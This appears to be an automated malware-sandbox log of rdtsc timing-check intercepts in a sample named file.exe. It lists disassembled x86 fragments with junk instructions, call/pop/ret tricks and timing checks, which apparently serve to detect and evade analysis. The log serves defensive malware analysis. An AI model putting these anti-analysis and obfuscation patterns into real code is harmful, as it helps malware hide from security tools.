Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9DCE3 second address: E9DD67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 mov bl, 00h 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F5408F96888h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D2BAFh], edx 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007F5408F96888h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 sub dword ptr [ebp+122D17EAh], edx 0x0000004e jmp 00007F5408F96899h 0x00000053 mov bh, 3Fh 0x00000055 xchg eax, esi 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9DD67 second address: E9DD6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9DD6B second address: E9DD91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jnl 00007F5408F96886h 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5408F96894h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9EE94 second address: E9EF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnl 00007F5408C2110Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push esi 0x0000000e jmp 00007F5408C2110Fh 0x00000013 pop esi 0x00000014 nop 0x00000015 cmc 0x00000016 push 00000000h 0x00000018 pushad 0x00000019 mov ecx, eax 0x0000001b sub ebx, 3287B071h 0x00000021 popad 0x00000022 push 00000000h 0x00000024 sub dword ptr [ebp+122D17E2h], edx 0x0000002a jmp 00007F5408C2110Ch 0x0000002f xchg eax, esi 0x00000030 pushad 0x00000031 push eax 0x00000032 jmp 00007F5408C21119h 0x00000037 pop eax 0x00000038 pushad 0x00000039 jmp 00007F5408C2110Dh 0x0000003e push edi 0x0000003f pop edi 0x00000040 popad 0x00000041 popad 0x00000042 push eax 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9DEBC second address: E9DEC6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5408F9688Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA69B2 second address: EA69BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 je 00007F5408C21106h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA616A second address: EA6178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jg 00007F5408F96888h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAD107 second address: EAD10B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAD10B second address: EAD127 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F96898h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAD283 second address: EAD2A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C21110h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jg 00007F5408C21106h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAD34F second address: EAD355 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAD355 second address: EAD359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAD359 second address: CD1748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 7142393Eh 0x0000000f pushad 0x00000010 sbb edx, 1CDA0288h 0x00000016 jg 00007F5408F96889h 0x0000001c popad 0x0000001d push dword ptr [ebp+122D128Dh] 0x00000023 pushad 0x00000024 jmp 00007F5408F96893h 0x00000029 popad 0x0000002a call dword ptr [ebp+122D1BA5h] 0x00000030 pushad 0x00000031 jmp 00007F5408F96893h 0x00000036 xor eax, eax 0x00000038 jg 00007F5408F96892h 0x0000003e jg 00007F5408F9688Ch 0x00000044 sub dword ptr [ebp+122D1DCCh], edi 0x0000004a mov edx, dword ptr [esp+28h] 0x0000004e cld 0x0000004f mov dword ptr [ebp+122D3438h], eax 0x00000055 cmc 0x00000056 mov esi, 0000003Ch 0x0000005b cld 0x0000005c jmp 00007F5408F96896h 0x00000061 add esi, dword ptr [esp+24h] 0x00000065 or dword ptr [ebp+122D1DCCh], edi 0x0000006b lodsw 0x0000006d mov dword ptr [ebp+122D1AC8h], ecx 0x00000073 jo 00007F5408F96887h 0x00000079 stc 0x0000007a add eax, dword ptr [esp+24h] 0x0000007e sub dword ptr [ebp+122D1AC8h], esi 0x00000084 mov ebx, dword ptr [esp+24h] 0x00000088 jnc 00007F5408F96892h 0x0000008e jno 00007F5408F9688Ch 0x00000094 nop 0x00000095 push eax 0x00000096 push eax 0x00000097 push edx 0x00000098 push eax 0x00000099 push edx 0x0000009a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB1FC4 second address: EB1FD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5408C2110Ah 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB1FD4 second address: EB1FDD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB1619 second address: EB163A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C21116h 0x00000007 push ebx 0x00000008 jne 00007F5408C21106h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB163A second address: EB1655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5408F96892h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB1655 second address: EB1672 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5408C21119h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB1795 second address: EB17C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 jng 00007F5408F96892h 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5408F96894h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB17C7 second address: EB17CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB17CB second address: EB17D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB17D1 second address: EB17DD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5408C2110Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E88977 second address: E8897B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8897B second address: E8897F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8897F second address: CD1748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push esi 0x00000009 jnl 00007F5408F9688Ch 0x0000000f pop esi 0x00000010 nop 0x00000011 sub dword ptr [ebp+122D18A6h], eax 0x00000017 push dword ptr [ebp+122D128Dh] 0x0000001d jmp 00007F5408F96894h 0x00000022 call dword ptr [ebp+122D1BA5h] 0x00000028 pushad 0x00000029 jmp 00007F5408F96893h 0x0000002e xor eax, eax 0x00000030 jg 00007F5408F96892h 0x00000036 jg 00007F5408F9688Ch 0x0000003c sub dword ptr [ebp+122D1DCCh], edi 0x00000042 mov edx, dword ptr [esp+28h] 0x00000046 cld 0x00000047 mov dword ptr [ebp+122D3438h], eax 0x0000004d cmc 0x0000004e mov esi, 0000003Ch 0x00000053 cld 0x00000054 jmp 00007F5408F96896h 0x00000059 add esi, dword ptr [esp+24h] 0x0000005d or dword ptr [ebp+122D1DCCh], edi 0x00000063 lodsw 0x00000065 mov dword ptr [ebp+122D1AC8h], ecx 0x0000006b jo 00007F5408F96887h 0x00000071 stc 0x00000072 add eax, dword ptr [esp+24h] 0x00000076 sub dword ptr [ebp+122D1AC8h], esi 0x0000007c mov ebx, dword ptr [esp+24h] 0x00000080 jnc 00007F5408F96892h 0x00000086 nop 0x00000087 push eax 0x00000088 push eax 0x00000089 push edx 0x0000008a push eax 0x0000008b push edx 0x0000008c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E88A6C second address: E88A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E88AD9 second address: E88ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E88ADD second address: E88AE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E88AE1 second address: E88AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E88BAD second address: E88BB7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5408C2110Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E88BB7 second address: E88BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xchg eax, esi 0x00000007 nop 0x00000008 jne 00007F5408F96892h 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E88BD7 second address: E88BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E88BDB second address: E88BDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E88C97 second address: E88CA1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E88CA1 second address: E88CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E88CA5 second address: E88CCA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5408C21106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5408C21117h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E88CCA second address: E88CCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E88CCF second address: E88D0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5408C21116h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push esi 0x00000011 push edi 0x00000012 jmp 00007F5408C2110Bh 0x00000017 pop edi 0x00000018 pop esi 0x00000019 mov eax, dword ptr [eax] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 jg 00007F5408C21106h 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E88F10 second address: E88F68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007F5408F96899h 0x0000000b pop edx 0x0000000c popad 0x0000000d push eax 0x0000000e jmp 00007F5408F96896h 0x00000013 nop 0x00000014 jno 00007F5408F9688Ch 0x0000001a push 00000004h 0x0000001c mov edi, dword ptr [ebp+122D1B69h] 0x00000022 push eax 0x00000023 jbe 00007F5408F96890h 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E89308 second address: E89357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F5408C21108h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 call 00007F5408C2110Fh 0x0000002b pop ecx 0x0000002c push 0000001Eh 0x0000002e mov dword ptr [ebp+122D2A3Fh], ecx 0x00000034 nop 0x00000035 push eax 0x00000036 push edx 0x00000037 jl 00007F5408C21108h 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E89457 second address: E8945B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8945B second address: E89461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E89461 second address: E89475 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 ja 00007F5408F96886h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E89475 second address: E89479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E688BF second address: E688D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F9688Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E403E4 second address: E403EE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5408C21106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBE6A5 second address: EBE6E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F5408F96898h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop edi 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5408F96897h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBE6E3 second address: EBE6E8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBEC0B second address: EBEC26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F96894h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBF004 second address: EBF013 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jp 00007F5408C21106h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBF013 second address: EBF022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 jc 00007F5408F9688Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBF022 second address: EBF03D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F5408C21115h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBF4AE second address: EBF4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBF4B9 second address: EBF4D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C2110Dh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F5408C2110Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC505F second address: EC507D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5408F96899h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC507D second address: EC50A9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5408C2111Dh 0x00000008 push edx 0x00000009 jmp 00007F5408C2110Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC3CFA second address: EC3D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC3FA2 second address: EC3FA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC4285 second address: EC428A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC43C6 second address: EC43CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC43CB second address: EC43D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC4532 second address: EC4542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edi 0x00000007 push edx 0x00000008 ja 00007F5408C21106h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC47C4 second address: EC47C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC47C8 second address: EC47CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC47CE second address: EC47F9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5408F9688Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jno 00007F5408F96892h 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007F5408F96886h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC47F9 second address: EC4803 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5408C21106h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC4963 second address: EC4985 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F9688Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F5408F9688Bh 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC4985 second address: EC49A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jc 00007F5408C21106h 0x0000000e jp 00007F5408C21106h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 jl 00007F5408C21112h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC49A4 second address: EC49AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC4F10 second address: EC4F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC38A7 second address: EC38B8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5408F9688Ch 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC38B8 second address: EC38DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5408C2110Ch 0x00000009 push esi 0x0000000a pop esi 0x0000000b jbe 00007F5408C21106h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jne 00007F5408C21106h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC38DF second address: EC38F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5408F96891h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC38F9 second address: EC38FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECAF72 second address: ECAF78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECAF78 second address: ECAF82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECE0AB second address: ECE0B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECE0B3 second address: ECE0B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECE0B7 second address: ECE0BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECE0BB second address: ECE0C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECE0C7 second address: ECE0ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F96897h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F5408F968A3h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECDD6F second address: ECDD75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECDD75 second address: ECDD79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECDD79 second address: ECDD7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
